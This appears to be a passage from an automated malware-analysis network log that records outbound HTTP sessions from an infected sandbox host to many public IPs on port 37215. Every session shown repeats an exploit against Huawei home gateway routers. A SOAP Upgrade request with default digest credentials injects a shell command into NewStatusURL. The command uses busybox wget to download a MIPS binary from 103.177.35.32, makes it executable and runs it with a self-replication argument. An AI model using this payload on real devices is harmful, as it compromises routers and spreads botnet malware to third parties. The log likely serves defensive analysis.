                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        626192.168.2.2358990197.151.186.18037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.493133068 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        627192.168.2.235792441.239.181.8537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.493150949 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        628192.168.2.233899294.150.20.21837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.493184090 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        629192.168.2.234019448.243.201.8437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.493240118 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        630192.168.2.2355310157.56.85.24737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.493313074 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        631192.168.2.2351624222.128.67.137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.493313074 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        632192.168.2.2344364157.181.47.24937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.493321896 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        633192.168.2.2344170137.1.42.16437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.493388891 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        634192.168.2.2336448157.79.235.12737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.493422031 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        635192.168.2.234480080.47.152.21537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.493432999 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
